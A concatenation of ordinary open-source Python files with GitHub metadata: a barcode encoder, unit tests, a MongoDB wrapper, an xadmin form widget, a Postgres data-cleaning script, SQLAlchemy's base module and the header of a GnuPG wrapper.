IllegalCharacterError in case the bar code contains illegal characters.
ValueError in case the bar code exceeds its maximum length or
if the checksum digit doesn't match.
"""
if not code.isdigit():
raise IllegalCharacterError('[0-9]{%d}' % UPCA.digits)
if len(code) != UPCA.digits:
raise ValueError('Bar code %s requires %d digits' % (code, UPCA.digits))
checksum = UPCA.calculate_checksum(code)
if checksum != int(code[-1]):
raise ValueError('Checksum character mismatch %s != %s' % (checksum, code[-1]))
def build(self):
"""Builds the bar code pattern.
Returns:
(str): the bar code pattern.
"""
code = _upc.EDGE[:]
for _, number in enumerate(self.code[0:6]):
code += _upc.CODES['L'][int(number)]
code += _upc.MIDDLE
for number in self.code[6:]:
code += _upc.CODES['R'][int(number)]
code += _upc.EDGE
return [code]
def to_ascii(self):
"""Returns an ASCII representation of the bar code.
Returns:
(str): ASCII representation of the bar code.
"""
code = self.build()
for i, line in enumerate(code):
code[i] = line.replace('1', '|').replace('0', '_')
return '\n'.join(code)
def render(self, writer_options=None):
options = dict(module_width=0.33)
options.update(writer_options or {})
return super(UPCA, self).render(options)
def get_fullcode(self):
return self._code
UniversalProductCodeA = UPCA
| {
"content_hash": "fd6bc6d9c1b0b4a377874b06a3ebdac8",
"timestamp": "",
"source": "github",
"line_count": 111,
"max_line_length": 97,
"avg_line_length": 25.414414414414413,
"alnum_prop": 0.5597305919886565,
"repo_name": "steenzout/python-barcode",
"id": "291d51681aed73df3759ffe2087a04aa70541139",
"size": "2845",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "steenzout/barcode/upc.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "64780"
}
],
"symlink_target": ""
} |
import pytest
import warnings
import offlinetb
def test_capture_warnings(recwarn):
warnings.simplefilter('always')
try:
f()
except CustomException:
tb = offlinetb.distill(var_depth=4)
[v] = [v for v in tb['traceback'][-1]['vars'] if v['name'] == 's']
assert v['vars'][0]['value'] == "'hi'"
assert len(recwarn) == 0
def f():
g()
def g():
class Something(object):
@property
def prop(self):
warnings.warn('deprecated', DeprecationWarning)
return 'hi'
s = Something() # pylint: disable=unused-variable
raise CustomException()
class CustomException(Exception):
pass
| {
"content_hash": "a2e00cbf2d8c5ccd09bdb97cf7af6185",
"timestamp": "",
"source": "github",
"line_count": 35,
"max_line_length": 70,
"avg_line_length": 19.542857142857144,
"alnum_prop": 0.5877192982456141,
"repo_name": "vmalloc/offlinetb",
"id": "833cea6c8f196852284de6dc389d774266d2333e",
"size": "684",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_deprecation_warnings_handling.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "2204"
},
{
"name": "HTML",
"bytes": "578"
},
{
"name": "JavaScript",
"bytes": "5196"
},
{
"name": "Makefile",
"bytes": "197"
},
{
"name": "Python",
"bytes": "17709"
}
],
"symlink_target": ""
} |
import pytest
import moldesign as mdt
from moldesign import units as u
from .molecule_fixtures import *
from . import helpers
def test_forcefield_atom_term_access(protein_default_amber_forcefield):
mol = protein_default_amber_forcefield
for atom in mol.atoms:
assert atom.ff.ljepsilon.dimensionality == u.kcalpermol.dimensionality
assert atom.ff.ljsigma.dimensionality == u.angstrom.dimensionality
assert atom.ff.partial_charge.dimensionality == u.q_e.dimensionality
assert atom.ff.pmdobj.idx == atom.index
assert atom.ff.pmdobj.element == atom.atnum
@pytest.mark.screening
def test_forcefield_bond_term_access(protein_default_amber_forcefield):
mol = protein_default_amber_forcefield
for bond in mol.bonds:
assert bond.ff.equilibrium_length.dimensionality == u.angstrom.dimensionality
assert bond.ff.force_constant.dimensionality == (u.kcalpermol/u.angstrom).dimensionality
pmdobj = bond.ff.pmdobj
pmdatoms = sorted((pmdobj.atom1, pmdobj.atom2), key=lambda x:x.idx)
assert (pmdatoms[0].idx, pmdatoms[1].idx) == (bond.a1.index, bond.a2.index)
assert (pmdatoms[0].element, pmdatoms[1].element) == (bond.a1.atnum, bond.a2.atnum)
def test_atom_basis_function_returns_none_if_no_wfn(h2):
for atom in h2.atoms:
assert atom.basis_functions is None
def test_atom_ffterms_returns_none_if_no_ff(h2):
for atom in h2.atoms:
assert atom.ff is None
def test_bond_ffterms_returns_none_if_no_ff(h2):
for bond in h2.bonds:
assert bond.ff is None
def test_basis_function_atom_access(h2_rhf_sto3g):
mol = h2_rhf_sto3g
for atom in mol.atoms:
assert len(atom.basis_functions) == 1 # good ol' sto-3g
assert len(atom.basis_functions[0].primitives) == 3
@pytest.mark.screening
def test_atom_property_access_to_mulliken_charges(h2_rhf_sto3g):
mol = h2_rhf_sto3g
for atom in mol.atoms:
assert abs(atom.properties.mulliken) <= 1e-5 * u.q_e
def test_atomic_forces(h2_rhf_sto3g):
mol = h2_rhf_sto3g
helpers.assert_almost_equal(mol.atoms[0].force, -mol.atoms[1].force)
def test_atom_properties_are_empty_dict_if_nothings_computed(h2):
empty = mdt.utils.DotDict()
for atom in h2.atoms:
assert atom.properties == empty
| {
"content_hash": "b8cdc58213ecd455d7c7e31da21d31e0",
"timestamp": "",
"source": "github",
"line_count": 71,
"max_line_length": 96,
"avg_line_length": 32.605633802816904,
"alnum_prop": 0.6997840172786177,
"repo_name": "Autodesk/molecular-design-toolkit",
"id": "d261cdb21c50a3ceaf2bb1c4d1b31173cc7d98e9",
"size": "2315",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "moldesign/_tests/test_atom_bond_computed_properties.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "141674"
},
{
"name": "Python",
"bytes": "1048484"
},
{
"name": "Shell",
"bytes": "12039"
}
],
"symlink_target": ""
} |
from datetime import datetime, timedelta
from pymongo import MongoClient, ReturnDocument
from pymongo.database import Database
from pymongo.errors import PyMongoError
from model.event import Event
from persist.eventencoder import EventEncoder
class MongoWrapper:
def __init__(self, debug=False):
self.debug = debug
try:
self.client = MongoClient('mongodb://localhost:27017/?connectTimeoutMS=100')
self.db = self.client.calendar
self.client.server_info()
except PyMongoError:
self.client = None
self.db = None
def save(self, _events, delete=True):
encoder = EventEncoder()
success = {"inserts": 0, "updates": 0, "deleted": 0}
failed = {"inserts": 0, "updates": 0, "deleted": 0}
skipped = 0
if self.db is None or self.client is None:
if self.debug:
print("Could not persist to MongoDB")
return False
if self.debug:
print("Begin MongoDB persist:")
min_date = datetime.now() + timedelta(weeks=12)
max_date = datetime.strptime('1970-01-01 00:00:00', '%Y-%m-%d %H:%M:%S')
ids = []
types = []
for _event in _events:
ids.append(_event.cal_id)
min_date = min(_event.start_time, min_date)
max_date = max(_event.start_time, max_date)
if _event.type not in types:
types.append(_event.type)
if isinstance(_event, Event):
original = self.db.events.find_one({"cal_id": _event.cal_id, "type": _event.type, "canceled": False, "start_time": _event.start_time, "end_time": _event.end_time})
if original is None:
_event.last_modified_time = datetime.now()
result = self.db.events.insert_one(encoder.encode(_event))
""" :type : pymongo.results.InsertOneResult """
if result.inserted_id:
success['inserts'] += 1
else:
failed['inserts'] += 1
else:
_event.canceled = False
original_event = encoder.decode(original)
if original_event != _event:
_event.last_modified_time = datetime.now()
result = self.db.events.replace_one(original, encoder.encode(_event))
""" @type : pymongo.results.UpdateResult """
if result.modified_count > 0:
success['updates'] += 1
else:
failed['updates'] += 1
else:
skipped += 1
if delete:
what = {"cal_id": {"$nin": ids}, "type": {"$in": types}, "start_time": {"$gte": min_date, "$lte": max_date}}
cursor = self.db.events.find(what)
for db_event in cursor:
search = {
"cal_id": db_event["cal_id"],
"type": db_event["type"],
}
if 'start_date' in db_event:
search["start_date"] = db_event["start_date"]
if 'end_date' in db_event:
search["end_date"] = db_event["end_date"]
canceled = self.db.events.find_one_and_update(search, {"$set": {"canceled": True}},
return_document=ReturnDocument.AFTER)
if canceled["canceled"]:
success['deleted'] += 1
else:
failed['deleted'] += 1
if self.debug:
print("SKIP: %d" % skipped)
print(" OK: INS:%d UPD:%d DEL:%d" % (success["inserts"], success["updates"], success["deleted"]))
if (failed["inserts"] + failed["updates"] + failed["deleted"]) > 0:
print(" NOK: INS:%d UPD:%d DEL:%d" % (failed["inserts"], failed["updates"], failed["deleted"]))
return True
def load_events(self, event_types, start_time, end_time=None):
decoder = EventEncoder()
_events = []
if not isinstance(self.db, Database):
if self.debug:
print("Could not load from MongoDB")
return _events
what = {"type": {"$in": event_types}, "start_time": {"$gte": start_time, "$lte": end_time}, "canceled": False}
cursor = self.db.events.find(what)
cursor.max_time_ms = 200
try:
if not cursor.alive or cursor.count() == 0:
return _events
except PyMongoError:
return _events
for event in cursor:
_event = decoder.decode(event)
if isinstance(_event, Event):
_events.append(_event)
return _events
| {
"content_hash": "43bfd6b186a81187b1bc9ce8ee1cf19a",
"timestamp": "",
"source": "github",
"line_count": 124,
"max_line_length": 179,
"avg_line_length": 39.524193548387096,
"alnum_prop": 0.4986737400530504,
"repo_name": "lpbm/tlcal",
"id": "c78761d8d8ebeeaeec36d7ec14a1bd59d6d86109",
"size": "4901",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "persist/mongowrapper.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "22574"
}
],
"symlink_target": ""
} |
from itertools import chain
import xadmin
from django import forms
from django.db.models import ManyToManyField
from django.forms.utils import flatatt
from django.template import loader
from django.utils.encoding import force_unicode
from django.utils.html import escape, conditional_escape
from django.utils.safestring import mark_safe
from xadmin.util import vendor
from xadmin.views import BaseAdminPlugin, ModelFormAdminView
class SelectMultipleTransfer(forms.SelectMultiple):
@property
def media(self):
return vendor('xadmin.widget.select-transfer.js', 'xadmin.widget.select-transfer.css')
def __init__(self, verbose_name, is_stacked, attrs=None, choices=()):
self.verbose_name = verbose_name
self.is_stacked = is_stacked
super(SelectMultipleTransfer, self).__init__(attrs, choices)
def render_opt(self, selected_choices, option_value, option_label):
option_value = force_unicode(option_value)
return u'<option value="%s">%s</option>' % (
escape(option_value), conditional_escape(force_unicode(option_label))), bool(option_value in selected_choices)
def render(self, name, value, attrs=None, choices=()):
if attrs is None:
attrs = {}
attrs['class'] = ''
if self.is_stacked:
attrs['class'] += 'stacked'
if value is None:
value = []
final_attrs = self.build_attrs(attrs, name=name)
selected_choices = set(force_unicode(v) for v in value)
available_output = []
chosen_output = []
for option_value, option_label in chain(self.choices, choices):
if isinstance(option_label, (list, tuple)):
available_output.append(u'<optgroup label="%s">' %
escape(force_unicode(option_value)))
for option in option_label:
output, selected = self.render_opt(
selected_choices, *option)
if selected:
chosen_output.append(output)
else:
available_output.append(output)
available_output.append(u'</optgroup>')
else:
output, selected = self.render_opt(
selected_choices, option_value, option_label)
if selected:
chosen_output.append(output)
else:
available_output.append(output)
context = {
'verbose_name': self.verbose_name,
'attrs': attrs,
'field_id': attrs['id'],
'flatatts': flatatt(final_attrs),
'available_options': u'\n'.join(available_output),
'chosen_options': u'\n'.join(chosen_output),
}
return mark_safe(loader.render_to_string('xadmin/forms/transfer.html', context))
class SelectMultipleDropdown(forms.SelectMultiple):
@property
def media(self):
return vendor('multiselect.js', 'multiselect.css', 'xadmin.widget.multiselect.js')
def render(self, name, value, attrs=None, choices=()):
if attrs is None:
attrs = {}
attrs['class'] = 'selectmultiple selectdropdown'
return super(SelectMultipleDropdown, self).render(name, value, attrs, choices)
class M2MSelectPlugin(BaseAdminPlugin):
def init_request(self, *args, **kwargs):
return hasattr(self.admin_view, 'style_fields') and \
(
'm2m_transfer' in self.admin_view.style_fields.values() or
'm2m_dropdown' in self.admin_view.style_fields.values()
)
def get_field_style(self, attrs, db_field, style, **kwargs):
if style == 'm2m_transfer' and isinstance(db_field, ManyToManyField):
return {'widget': SelectMultipleTransfer(db_field.verbose_name, False), 'help_text': ''}
if style == 'm2m_dropdown' and isinstance(db_field, ManyToManyField):
return {'widget': SelectMultipleDropdown, 'help_text': ''}
return attrs
xadmin.site.register_plugin(M2MSelectPlugin, ModelFormAdminView)
| {
"content_hash": "7309adac60ba7cfb2786ad11c7ec3107",
"timestamp": "",
"source": "github",
"line_count": 106,
"max_line_length": 122,
"avg_line_length": 40.10377358490566,
"alnum_prop": 0.5951540813926135,
"repo_name": "LennonChin/Django-Practices",
"id": "eabb2cc229396b360d6b43d0bd5970e021104c21",
"size": "4266",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "MxOnline/extra_apps/xadmin/plugins/multiselect.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "ASP",
"bytes": "1538"
},
{
"name": "CSS",
"bytes": "513444"
},
{
"name": "HTML",
"bytes": "501361"
},
{
"name": "Java",
"bytes": "588"
},
{
"name": "JavaScript",
"bytes": "1810740"
},
{
"name": "PHP",
"bytes": "19336"
},
{
"name": "Python",
"bytes": "1739514"
}
],
"symlink_target": ""
} |
import psycopg2
import sys
import os
# define queries
QUERIES = {}
# delete not land surface data
QUERIES['delete_not_land_surface_data'] = ("""
DELETE FROM tambora_temperature_monthly WHERE event_id in (SELECT event_id FROM tambora_temperature_monthly AS AA
LEFT JOIN world_coastline_50m_poly as BB
ON ST_Intersects(ST_SetSRID(ST_MakePoint(AA.lon,AA.lat),4326),BB.geom)
WHERE BB.gid is null
AND AA.location_id != 7902);
""")
# delete events outside central europe
QUERIES['delete_outside_central_eu'] = ("""
DELETE FROM tambora_temperature_monthly WHERE event_id not in (SELECT event_id FROM tambora_temperature_monthly AS AA
LEFT JOIN temperature_cru_mean as BB
ON ST_Intersects(ST_SetSRID(ST_MakePoint(AA.lon,AA.lat),4326),BB.rast)
WHERE BB.month = 1
AND AA.location_id != 7902);
""")
# delete world poly shape
QUERIES['drop_world_poly'] = ("""
DROP TABLE world_coastline_50m_poly;
""")
# get command line arguments
dbHost = sys.argv[1]
dbName = sys.argv[2]
dbUser = sys.argv[3]
dbPass = sys.argv[4]
shpFile = sys.argv[5]
con = None
# upload world polygon vector data to db
os.system("/usr/bin/shp2pgsql -s 4326 " + str(shpFile) + " public.world_coastline_50m_poly | psql -d "+dbName+" -U "+dbUser)
try:
con = psycopg2.connect(host=dbHost, database=dbName, user=dbUser, password=dbPass)
cur = con.cursor()
for name, ddl in QUERIES.iteritems():
try:
print("Execute Query {}: ".format(name))
cur.execute(ddl)
except psycopg2.Error as err:
con.rollback()
print err.pgerror
else:
print("OK")
except psycopg2.DatabaseError, e:
print 'Error %s' % e
sys.exit(1)
finally:
if con:
con.commit()
con.close() | {
"content_hash": "c1a412f25e0a99682cddbb6daa43930d",
"timestamp": "",
"source": "github",
"line_count": 64,
"max_line_length": 124,
"avg_line_length": 28.453125,
"alnum_prop": 0.6447007138934652,
"repo_name": "ElenorFrisbee/MSC",
"id": "f9f9e71c0227903d505a7487c616f08ba9f85a82",
"size": "1859",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "regmodR/startup_scripts/checkTambora.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "48977"
},
{
"name": "HTML",
"bytes": "31471"
},
{
"name": "JavaScript",
"bytes": "553274"
},
{
"name": "PHP",
"bytes": "90352"
},
{
"name": "Python",
"bytes": "36062"
},
{
"name": "R",
"bytes": "122184"
},
{
"name": "Shell",
"bytes": "13192"
}
],
"symlink_target": ""
} |
"""Foundational utilities common to many sql modules.
"""
from .. import util, exc
import itertools
from .visitors import ClauseVisitor
import re
import collections
PARSE_AUTOCOMMIT = util.symbol('PARSE_AUTOCOMMIT')
NO_ARG = util.symbol('NO_ARG')
class Immutable(object):
"""mark a ClauseElement as 'immutable' when expressions are cloned."""
def unique_params(self, *optionaldict, **kwargs):
raise NotImplementedError("Immutable objects do not support copying")
def params(self, *optionaldict, **kwargs):
raise NotImplementedError("Immutable objects do not support copying")
def _clone(self):
return self
def _from_objects(*elements):
return itertools.chain(*[element._from_objects for element in elements])
@util.decorator
def _generative(fn, *args, **kw):
"""Mark a method as generative."""
self = args[0]._generate()
fn(self, *args[1:], **kw)
return self
class _DialectArgView(collections.MutableMapping):
"""A dictionary view of dialect-level arguments in the form
<dialectname>_<argument_name>.
"""
def __init__(self, obj):
self.obj = obj
def _key(self, key):
try:
dialect, value_key = key.split("_", 1)
except ValueError:
raise KeyError(key)
else:
return dialect, value_key
def __getitem__(self, key):
dialect, value_key = self._key(key)
try:
opt = self.obj.dialect_options[dialect]
except exc.NoSuchModuleError:
raise KeyError(key)
else:
return opt[value_key]
def __setitem__(self, key, value):
try:
dialect, value_key = self._key(key)
except KeyError:
raise exc.ArgumentError(
"Keys must be of the form <dialectname>_<argname>")
else:
self.obj.dialect_options[dialect][value_key] = value
def __delitem__(self, key):
dialect, value_key = self._key(key)
del self.obj.dialect_options[dialect][value_key]
def __len__(self):
return sum(len(args._non_defaults) for args in
self.obj.dialect_options.values())
def __iter__(self):
return (
"%s_%s" % (dialect_name, value_name)
for dialect_name in self.obj.dialect_options
for value_name in self.obj.dialect_options[dialect_name]._non_defaults
)
class _DialectArgDict(collections.MutableMapping):
"""A dictionary view of dialect-level arguments for a specific
dialect.
Maintains a separate collection of user-specified arguments
and dialect-specified default arguments.
"""
def __init__(self):
self._non_defaults = {}
self._defaults = {}
def __len__(self):
return len(set(self._non_defaults).union(self._defaults))
def __iter__(self):
return iter(set(self._non_defaults).union(self._defaults))
def __getitem__(self, key):
if key in self._non_defaults:
return self._non_defaults[key]
else:
return self._defaults[key]
def __setitem__(self, key, value):
self._non_defaults[key] = value
def __delitem__(self, key):
del self._non_defaults[key]
class DialectKWArgs(object):
"""Establish the ability for a class to have dialect-specific arguments
with defaults and constructor validation.
The :class:`.DialectKWArgs` interacts with the
:attr:`.DefaultDialect.construct_arguments` present on a dialect.
.. seealso::
:attr:`.DefaultDialect.construct_arguments`
"""
@classmethod
def argument_for(cls, dialect_name, argument_name, default):
"""Add a new kind of dialect-specific keyword argument for this class.
E.g.::
Index.argument_for("mydialect", "length", None)
some_index = Index('a', 'b', mydialect_length=5)
The :meth:`.DialectKWArgs.argument_for` method is a per-argument
way adding extra arguments to the :attr:`.DefaultDialect.construct_arguments`
dictionary. This dictionary provides a list of argument names accepted by
various schema-level constructs on behalf of a dialect.
New dialects should typically specify this dictionary all at once as a data
member of the dialect class. The use case for ad-hoc addition of
argument names is typically for end-user code that is also using
a custom compilation scheme which consumes the additional arguments.
:param dialect_name: name of a dialect. The dialect must be locatable,
else a :class:`.NoSuchModuleError` is raised. The dialect must
also include an existing :attr:`.DefaultDialect.construct_arguments` collection,
indicating that it participates in the keyword-argument validation and
default system, else :class:`.ArgumentError` is raised.
If the dialect does not include this collection, then any keyword argument
can be specified on behalf of this dialect already. All dialects
packaged within SQLAlchemy include this collection, however for third
party dialects, support may vary.
:param argument_name: name of the parameter.
:param default: default value of the parameter.
.. versionadded:: 0.9.4
"""
construct_arg_dictionary = DialectKWArgs._kw_registry[dialect_name]
if construct_arg_dictionary is None:
raise exc.ArgumentError("Dialect '%s' does have keyword-argument "
"validation and defaults enabled configured" %
dialect_name)
if cls not in construct_arg_dictionary:
construct_arg_dictionary[cls] = {}
construct_arg_dictionary[cls][argument_name] = default
@util.memoized_property
def dialect_kwargs(self):
"""A collection of keyword arguments specified as dialect-specific
options to this construct.
The arguments are present here in their original ``<dialect>_<kwarg>``
format. Only arguments that were actually passed are included;
unlike the :attr:`.DialectKWArgs.dialect_options` collection, which
contains all options known by this dialect including defaults.
The collection is also writable; keys are accepted of the
form ``<dialect>_<kwarg>`` where the value will be assembled
into the list of options.
.. versionadded:: 0.9.2
.. versionchanged:: 0.9.4 The :attr:`.DialectKWArgs.dialect_kwargs`
collection is now writable.
.. seealso::
:attr:`.DialectKWArgs.dialect_options` - nested dictionary form
"""
return _DialectArgView(self)
@property
def kwargs(self):
"""A synonym for :attr:`.DialectKWArgs.dialect_kwargs`."""
return self.dialect_kwargs
@util.dependencies("sqlalchemy.dialects")
def _kw_reg_for_dialect(dialects, dialect_name):
dialect_cls = dialects.registry.load(dialect_name)
if dialect_cls.construct_arguments is None:
return None
return dict(dialect_cls.construct_arguments)
_kw_registry = util.PopulateDict(_kw_reg_for_dialect)
def _kw_reg_for_dialect_cls(self, dialect_name):
construct_arg_dictionary = DialectKWArgs._kw_registry[dialect_name]
d = _DialectArgDict()
if construct_arg_dictionary is None:
d._defaults.update({"*": None})
else:
for cls in reversed(self.__class__.__mro__):
if cls in construct_arg_dictionary:
d._defaults.update(construct_arg_dictionary[cls])
return d
@util.memoized_property
def dialect_options(self):
"""A collection of keyword arguments specified as dialect-specific
options to this construct.
This is a two-level nested registry, keyed to ``<dialect_name>``
and ``<argument_name>``. For example, the ``postgresql_where`` argument
would be locatable as::
arg = my_object.dialect_options['postgresql']['where']
.. versionadded:: 0.9.2
.. seealso::
:attr:`.DialectKWArgs.dialect_kwargs` - flat dictionary form
"""
return util.PopulateDict(
util.portable_instancemethod(self._kw_reg_for_dialect_cls)
)
def _validate_dialect_kwargs(self, kwargs):
# validate remaining kwargs that they all specify DB prefixes
if not kwargs:
return
for k in kwargs:
m = re.match('^(.+?)_(.+)$', k)
if not m:
raise TypeError("Additional arguments should be "
"named <dialectname>_<argument>, got '%s'" % k)
dialect_name, arg_name = m.group(1, 2)
try:
construct_arg_dictionary = self.dialect_options[dialect_name]
except exc.NoSuchModuleError:
util.warn(
"Can't validate argument %r; can't "
"locate any SQLAlchemy dialect named %r" %
(k, dialect_name))
self.dialect_options[dialect_name] = d = _DialectArgDict()
d._defaults.update({"*": None})
d._non_defaults[arg_name] = kwargs[k]
else:
if "*" not in construct_arg_dictionary and \
arg_name not in construct_arg_dictionary:
raise exc.ArgumentError(
"Argument %r is not accepted by "
"dialect %r on behalf of %r" % (
k,
dialect_name, self.__class__
))
else:
construct_arg_dictionary[arg_name] = kwargs[k]
class Generative(object):
"""Allow a ClauseElement to generate itself via the
@_generative decorator.
"""
def _generate(self):
s = self.__class__.__new__(self.__class__)
s.__dict__ = self.__dict__.copy()
return s
class Executable(Generative):
"""Mark a ClauseElement as supporting execution.
:class:`.Executable` is a superclass for all "statement" types
of objects, including :func:`select`, :func:`delete`, :func:`update`,
:func:`insert`, :func:`text`.
"""
supports_execution = True
_execution_options = util.immutabledict()
_bind = None
@_generative
def execution_options(self, **kw):
""" Set non-SQL options for the statement which take effect during
execution.
Execution options can be set on a per-statement or
per :class:`.Connection` basis. Additionally, the
:class:`.Engine` and ORM :class:`~.orm.query.Query` objects provide
access to execution options which they in turn configure upon
connections.
The :meth:`execution_options` method is generative. A new
instance of this statement is returned that contains the options::
statement = select([table.c.x, table.c.y])
statement = statement.execution_options(autocommit=True)
Note that only a subset of possible execution options can be applied
to a statement - these include "autocommit" and "stream_results",
but not "isolation_level" or "compiled_cache".
See :meth:`.Connection.execution_options` for a full list of
possible options.
.. seealso::
:meth:`.Connection.execution_options()`
:meth:`.Query.execution_options()`
"""
if 'isolation_level' in kw:
raise exc.ArgumentError(
"'isolation_level' execution option may only be specified "
"on Connection.execution_options(), or "
"per-engine using the isolation_level "
"argument to create_engine()."
)
if 'compiled_cache' in kw:
raise exc.ArgumentError(
"'compiled_cache' execution option may only be specified "
"on Connection.execution_options(), not per statement."
)
self._execution_options = self._execution_options.union(kw)
def execute(self, *multiparams, **params):
"""Compile and execute this :class:`.Executable`."""
e = self.bind
if e is None:
label = getattr(self, 'description', self.__class__.__name__)
msg = ('This %s is not directly bound to a Connection or Engine.'
'Use the .execute() method of a Connection or Engine '
'to execute this construct.' % label)
raise exc.UnboundExecutionError(msg)
return e._execute_clauseelement(self, multiparams, params)
def scalar(self, *multiparams, **params):
"""Compile and execute this :class:`.Executable`, returning the
result's scalar representation.
"""
return self.execute(*multiparams, **params).scalar()
@property
def bind(self):
"""Returns the :class:`.Engine` or :class:`.Connection` to
which this :class:`.Executable` is bound, or None if none found.
This is a traversal which checks locally, then
checks among the "from" clauses of associated objects
until a bound engine or connection is found.
"""
if self._bind is not None:
return self._bind
for f in _from_objects(self):
if f is self:
continue
engine = f.bind
if engine is not None:
return engine
else:
return None
class SchemaEventTarget(object):
"""Base class for elements that are the targets of :class:`.DDLEvents`
events.
This includes :class:`.SchemaItem` as well as :class:`.SchemaType`.
"""
def _set_parent(self, parent):
"""Associate with this SchemaEvent's parent object."""
raise NotImplementedError()
def _set_parent_with_dispatch(self, parent):
self.dispatch.before_parent_attach(self, parent)
self._set_parent(parent)
self.dispatch.after_parent_attach(self, parent)
class SchemaVisitor(ClauseVisitor):
"""Define the visiting for ``SchemaItem`` objects."""
__traverse_options__ = {'schema_visitor': True}
class ColumnCollection(util.OrderedProperties):
"""An ordered dictionary that stores a list of ColumnElement
instances.
Overrides the ``__eq__()`` method to produce SQL clauses between
sets of correlated columns.
"""
def __init__(self):
super(ColumnCollection, self).__init__()
self.__dict__['_all_col_set'] = util.column_set()
self.__dict__['_all_columns'] = []
def __str__(self):
return repr([str(c) for c in self])
def replace(self, column):
"""add the given column to this collection, removing unaliased
versions of this column as well as existing columns with the
same key.
e.g.::
t = Table('sometable', metadata, Column('col1', Integer))
t.columns.replace(Column('col1', Integer, key='columnone'))
will remove the original 'col1' from the collection, and add
the new column under the name 'columnname'.
Used by schema.Column to override columns during table reflection.
"""
remove_col = None
if column.name in self and column.key != column.name:
other = self[column.name]
if other.name == other.key:
remove_col = other
self._all_col_set.remove(other)
del self._data[other.key]
if column.key in self._data:
remove_col = self._data[column.key]
self._all_col_set.remove(remove_col)
self._all_col_set.add(column)
self._data[column.key] = column
if remove_col is not None:
self._all_columns[:] = [column if c is remove_col
else c for c in self._all_columns]
else:
self._all_columns.append(column)
def add(self, column):
"""Add a column to this collection.
The key attribute of the column will be used as the hash key
for this dictionary.
"""
if not column.key:
raise exc.ArgumentError(
"Can't add unnamed column to column collection")
self[column.key] = column
def __delitem__(self, key):
raise NotImplementedError()
def __setattr__(self, key, object):
raise NotImplementedError()
def __setitem__(self, key, value):
if key in self:
# this warning is primarily to catch select() statements
# which have conflicting column names in their exported
# columns collection
existing = self[key]
if not existing.shares_lineage(value):
util.warn('Column %r on table %r being replaced by '
'%r, which has the same key. Consider '
'use_labels for select() statements.' % (key,
getattr(existing, 'table', None), value))
# pop out memoized proxy_set as this
# operation may very well be occurring
# in a _make_proxy operation
util.memoized_property.reset(value, "proxy_set")
self._all_col_set.add(value)
self._all_columns.append(value)
self._data[key] = value
def clear(self):
raise NotImplementedError()
def remove(self, column):
del self._data[column.key]
self._all_col_set.remove(column)
self._all_columns[:] = [c for c in self._all_columns if c is not column]
def update(self, iter):
cols = list(iter)
self._all_columns.extend(c for label, c in cols if c not in self._all_col_set)
self._all_col_set.update(c for label, c in cols)
self._data.update((label, c) for label, c in cols)
def extend(self, iter):
cols = list(iter)
self._all_columns.extend(c for c in cols if c not in self._all_col_set)
self._all_col_set.update(cols)
self._data.update((c.key, c) for c in cols)
__hash__ = None
@util.dependencies("sqlalchemy.sql.elements")
def __eq__(self, elements, other):
l = []
for c in getattr(other, "_all_columns", other):
for local in self._all_columns:
if c.shares_lineage(local):
l.append(c == local)
return elements.and_(*l)
def __contains__(self, other):
if not isinstance(other, util.string_types):
raise exc.ArgumentError("__contains__ requires a string argument")
return util.OrderedProperties.__contains__(self, other)
def __getstate__(self):
return {'_data': self.__dict__['_data'],
'_all_columns': self.__dict__['_all_columns']}
def __setstate__(self, state):
self.__dict__['_data'] = state['_data']
self.__dict__['_all_columns'] = state['_all_columns']
self.__dict__['_all_col_set'] = util.column_set(state['_all_columns'])
def contains_column(self, col):
# this has to be done via set() membership
return col in self._all_col_set
def as_immutable(self):
return ImmutableColumnCollection(self._data, self._all_col_set, self._all_columns)
class ImmutableColumnCollection(util.ImmutableProperties, ColumnCollection):
def __init__(self, data, colset, all_columns):
util.ImmutableProperties.__init__(self, data)
self.__dict__['_all_col_set'] = colset
self.__dict__['_all_columns'] = all_columns
extend = remove = util.ImmutableProperties._immutable
class ColumnSet(util.ordered_column_set):
def contains_column(self, col):
return col in self
def extend(self, cols):
for col in cols:
self.add(col)
def __add__(self, other):
return list(self) + list(other)
@util.dependencies("sqlalchemy.sql.elements")
def __eq__(self, elements, other):
l = []
for c in other:
for local in self:
if c.shares_lineage(local):
l.append(c == local)
return elements.and_(*l)
def __hash__(self):
return hash(tuple(x for x in self))
def _bind_or_error(schemaitem, msg=None):
bind = schemaitem.bind
if not bind:
name = schemaitem.__class__.__name__
label = getattr(schemaitem, 'fullname',
getattr(schemaitem, 'name', None))
if label:
item = '%s object %r' % (name, label)
else:
item = '%s object' % name
if msg is None:
msg = "%s is not bound to an Engine or Connection. "\
"Execution can not proceed without a database to execute "\
"against." % item
raise exc.UnboundExecutionError(msg)
return bind
| {
"content_hash": "1ea93316f47e28a0db33d126092d0f28",
"timestamp": "",
"source": "github",
"line_count": 620,
"max_line_length": 90,
"avg_line_length": 34.08387096774194,
"alnum_prop": 0.5924664016657203,
"repo_name": "michaelBenin/sqlalchemy",
"id": "28f324ad9d53568d5cc484a36c64d27a9e48a5d1",
"size": "21362",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "lib/sqlalchemy/sql/base.py",
"mode": "33188",
"license": "mit",
"language": [],
"symlink_target": ""
} |
"""
From sourceforge pycrypto project:
http://sourceforge.net/projects/pycrypto/
Code for running GnuPG from Python and dealing with the results.
===================================================================
Distribute and use freely; there are no restrictions on further
dissemination and usage except those imposed by the laws of your
country of residence. This software is provided "as is" without
warranty of fitness for use or suitability for any purpose, express
or implied. Use at your own risk or not at all.
===================================================================
Incorporating the code into commercial products is permitted; you do
not have to make source available or contribute your changes back
(though that would be nice).
--amk (www.amk.ca)
Detailed info about the format of data to/from gpg may be obtained from the
file DETAILS in the gnupg source.
Dependencies
- GPG must be installed
- http://www.gnupg.org
- http://www.gpg4win.org
Authors:
Andrew Kuchling
